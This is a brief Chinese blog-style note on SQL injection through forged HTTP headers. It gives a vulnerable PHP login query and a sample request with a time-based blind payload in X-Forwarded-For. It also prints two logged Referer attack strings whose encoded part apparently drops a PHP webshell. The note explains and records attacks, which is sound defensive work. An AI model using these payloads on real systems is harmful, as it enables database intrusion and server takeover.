SQL Injection: http header

偽造 http header 內的資料來做 SQL injection

X Forwarded for SQL injection
大致就是
若有類似的查詢：
SELECT username, password FROM users-data WHERE username='".sanitize($_POST['username'])."'
AND password='".md5($_POST['password'])."' AND ip_adr='".ipadr()


Client 端塞入偽造的 X-Forwarded-For 資料
類似

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) ...........
X-Forwarded-For: "XOR(if(now()=sysdate(),sleep(6),0))OR”
X-Requested-With: XMLHttpRequest
Referer: http://internal.customer.info/
Host: internal.customer.info
Connection: close
Accept-Encoding: gzip,deflate
Accept: /

當然 User-Agent、Referer、cookies 都可偽造
讓 server 陷入 SQL injection 的危機


其它參考
HDWiki v6.0最新版referer注入漏洞
這篇是講 referer 的 SQL injection 案例

SQL注入：Http header injection
這篇是 User Agent 的 SQL injtion 案例


2019-04-12
看到系統紀錄中，
Referer 被放置了﹔

554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b246173642
75D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79
776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3
:"'/*";}


554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:1480:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364
275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a793476615731685a32567a4c3
35677624739685a43396d6457356a64476c7662693570626d4d75634768774a79786959584e6c4e6a52665a47566a6232526c4b43645152446c3359556842
53306c445157644a5230357a5756684f656b6c46526a64446155466e53554e425a306c445157644a5130466e5355686161474e705157746b52315a365a454
e424f556c44536d7461567a46325357707a53306c445157644a5130466e53554e425a306c4451576461626c5a3157544e53634749794e4764594d546c7257
6c684f4d474e75566d706b513264775a5864765a306c445157644a5130466e53554e425a306c445157644a5130466e53554e425a306c46516d786b62555a7
a53304e534d4746486248704d56445577576c684f4d4574556330744a5130466e53554e425a306c445157644a5130466e5a6c46765a306c445157646d5557
396e53554e425a307049556d786a4d31466e55464e4361566c59546d784f616c4a6d576b6457616d4979556d784c51314a6d5655553556465a476332356a4
d314a355a46646b626d4a48565735595532733351326c425a306c445157746952315a31535551775a324d7a556e6c6952315a3153304e534d467059546a42
4c55334e34543364765a306c445157644b53454a33535551775a306c724f445a4e5648426a5357744759306c7162336850626e5236543270524e6c6844536
a42615745347757454e4a4e324e3662326c4d61564a7a576c633064556c7163474e4a61556c31536b685362474d7a5558564a616e526a535770304f556c71
6330744a5130466e53554e534d467059546a42594d315a31597a4a5765556c454d47646b567a5636576c684b63466c586548426c62565676536b684364307
45563307451656a51394a796b702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}